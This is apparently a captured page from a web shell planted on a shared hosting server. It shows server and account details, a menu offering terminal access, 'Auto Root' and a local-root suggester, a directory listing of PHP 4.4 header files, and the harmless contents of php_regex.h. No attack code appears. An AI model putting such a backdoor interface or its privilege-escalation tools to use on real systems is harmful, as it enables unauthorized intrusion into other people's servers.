Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php44 /
usr /
include /
php /
main /
Delete
Unzip
Name
Size
Permission
Date
Action
SAPI.h
8.27
KB
-rw-r--r--
2023-05-22 12:14
build-defs.h
6.17
KB
-rw-r--r--
2023-05-22 12:14
config.w32.h
4.52
KB
-rw-r--r--
2023-05-22 12:14
fopen_wrappers.h
2.01
KB
-rw-r--r--
2023-05-22 12:14
internal_functions_registry.h
1.55
KB
-rw-r--r--
2023-05-22 12:14
logos.h
37.71
KB
-rw-r--r--
2023-05-22 12:14
php.h
10.51
KB
-rw-r--r--
2023-05-22 12:14
php3_compat.h
3.34
KB
-rw-r--r--
2023-05-22 12:14
php_compat.h
6.77
KB
-rw-r--r--
2023-05-22 12:14
php_config.h
55.26
KB
-rw-r--r--
2023-05-22 12:14
php_content_types.h
316
B
-rw-r--r--
2023-05-22 12:14
php_embed.h
2.09
KB
-rw-r--r--
2023-05-22 12:14
php_globals.h
3.56
KB
-rw-r--r--
2023-05-22 12:14
php_ini.h
2.81
KB
-rw-r--r--
2023-05-22 12:14
php_logos.h
348
B
-rw-r--r--
2023-05-22 12:14
php_main.h
2.43
KB
-rw-r--r--
2023-05-22 12:14
php_memory_streams.h
3.05
KB
-rw-r--r--
2023-05-22 12:14
php_network.h
5.91
KB
-rw-r--r--
2023-05-22 12:14
php_open_temporary_file.h
1.48
KB
-rw-r--r--
2023-05-22 12:14
php_output.h
4.48
KB
-rw-r--r--
2023-05-22 12:14
php_reentrancy.h
3.56
KB
-rw-r--r--
2023-05-22 12:14
php_regex.h
883
B
-rw-r--r--
2023-05-22 12:14
php_scandir.h
1.93
KB
-rw-r--r--
2023-05-22 12:14
php_streams.h
32.14
KB
-rw-r--r--
2023-05-22 12:14
php_syslog.h
430
B
-rw-r--r--
2023-05-22 12:14
php_ticks.h
1.52
KB
-rw-r--r--
2023-05-22 12:14
php_variables.h
1.93
KB
-rw-r--r--
2023-05-22 12:14
php_version.h
235
B
-rw-r--r--
2023-05-22 12:14
rfc1867.h
281
B
-rw-r--r--
2023-05-22 12:14
safe_mode.h
603
B
-rw-r--r--
2023-05-22 12:14
snprintf.h
6.31
KB
-rw-r--r--
2023-05-22 12:14
spprintf.h
2.01
KB
-rw-r--r--
2023-05-22 12:14
win95nt.h
1.53
KB
-rw-r--r--
2023-05-22 12:14
Save
Rename
#ifndef PHP_REGEX_H #define PHP_REGEX_H /* * REGEX means: * 0.. system regex * 1.. bundled regex */ #if REGEX /* get aliases */ #include "regex/regex_extra.h" #include "regex/regex.h" /* get rid of aliases */ #define PHP_NO_ALIASES #include "regex/regex_extra.h" #undef PHP_NO_ALIASES #undef _PCREPOSIX_H #define _PCREPOSIX_H 1 #ifndef _REGEX_H #define _REGEX_H 1 /* this should stop Apache from loading the system version of regex.h */ #endif #ifndef _REGEX_H_ #define _REGEX_H_ 1 #endif #ifndef _RX_H #define _RX_H 1 /* Try defining these for Linux to */ #endif #ifndef __REGEXP_LIBRARY_H__ #define __REGEXP_LIBRARY_H__ 1 /* avoid Apache including regex.h */ #endif #ifndef _H_REGEX #define _H_REGEX 1 /* This one is for AIX */ #endif #elif REGEX == 0 #include <regex.h> #ifndef _REGEX_H_ #define _REGEX_H_ 1 #endif #endif #endif /* PHP_REGEX_H */